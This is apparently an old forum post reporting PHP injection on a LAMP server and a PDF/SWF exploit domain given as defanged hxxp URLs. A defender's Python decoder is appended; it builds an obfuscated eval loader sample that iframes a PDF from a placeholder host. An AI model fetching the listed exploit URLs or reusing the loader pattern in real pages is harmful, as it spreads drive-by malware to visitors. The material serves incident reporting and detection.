0 Replies Latest reply on Jan 16, 2010 6:43 AM by asotsiaal

    Beware: pdf/swf exploit - server used holofader.cn

      Forensics team - please investigate!


      I found on my LAMP server several vhosts being hacked. All index.php files were appended with the following script. (included)


      My personal (honeypot) PC (with IE8) resolved the hash and made an automatic query to the following addresses:


      hxxp://holofader.cn/3/moreBook.swf
      hxxp://holofader.cn/3/sByBook.pdf


      Possibly the PC is compromised already.

      Message was edited by: Samantha Price - editing links for the protection of other users.  on 1/16/10 6:43:11 AM CST
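A defender-side decoder for the loader shape the post describes (a numeric Array, a one-byte XOR key, String.fromCharCode and eval chained through random variable names). This is an added example, not code from the post or the injected script; it decodes statically, never evaluates anything, and the sample script, its variable names and the loader.example URL are constructed placeholders.

```python
import re
from typing import List, Optional

# Loader shape from the post: numeric Array, one-byte XOR key, String.fromCharCode, eval.
ARRAY_RE = re.compile(r"new Array\(\s*([\d,\s]+?)\s*\)")
XOR_RE = re.compile(r"\[\s*\w+\s*\]\s*\^\s*(\w+)")
URL_RE = re.compile(r"https?://[\w.-]+(?:/[\w./%-]*)?")


def decode_xor_loader(script: str) -> Optional[str]:
    """Decode the Array/XOR/fromCharCode payload statically (nothing is eval'd).
    Returns the decoded text, or None if the script is not in this shape."""
    arr = ARRAY_RE.search(script)
    xor = XOR_RE.search(script)
    if not arr or not xor:
        return None
    # Whitespace inside the number list is common when the script was copied
    # from a wrapped forum post; strip it so numbers like "12 2" are rejoined.
    nums = [int(n) for n in re.sub(r"\s+", "", arr.group(1)).split(",") if n]
    key_match = re.search(r"\b" + re.escape(xor.group(1)) + r"\s*=\s*(\d+)\s*;", script)
    if not key_match:
        return None
    key = int(key_match.group(1))
    return "".join(chr(n ^ key) for n in nums)


def is_xor_eval_loader(script: str) -> bool:
    """Triage check for index.php-style injections: decodable AND wired to eval."""
    return (decode_xor_loader(script) is not None and "fromCharCode" in script
            and re.search(r"\beval\b", script) is not None)


def extract_urls(decoded: str) -> List[str]:
    """Pull URLs out of the decoded stage and defang them (hxxp) for reporting."""
    return [u.replace("http", "hxxp", 1) for u in URL_RE.findall(decoded)]


def build_sample(plaintext: str, key: int) -> str:
    """Constructed test input in the same shape as the loader (names are made up)."""
    arr = ",".join(str(ord(c) ^ key) for c in plaintext)
    return ("<script>aa=new Array(" + arr + ');bb="";cc=' + str(key) +
            ";dd=eval;ee=String.fromCharCode;for(ff in aa)bb+=ee(aa[ff]^cc);dd(bb);</script>")


if __name__ == "__main__":
    # Constructed sample; loader.example is a placeholder, not a real indicator.
    sample = build_sample('document.write(\'<iframe src="http://loader.example/3/sample.pdf"></iframe>\')', 70)
    stage = decode_xor_loader(sample)
    print(is_xor_eval_loader(sample), stage, extract_urls(stage or ""))
```

Running it over each index.php on the affected vhosts flags the injected block and yields defanged URLs without ever executing the loader.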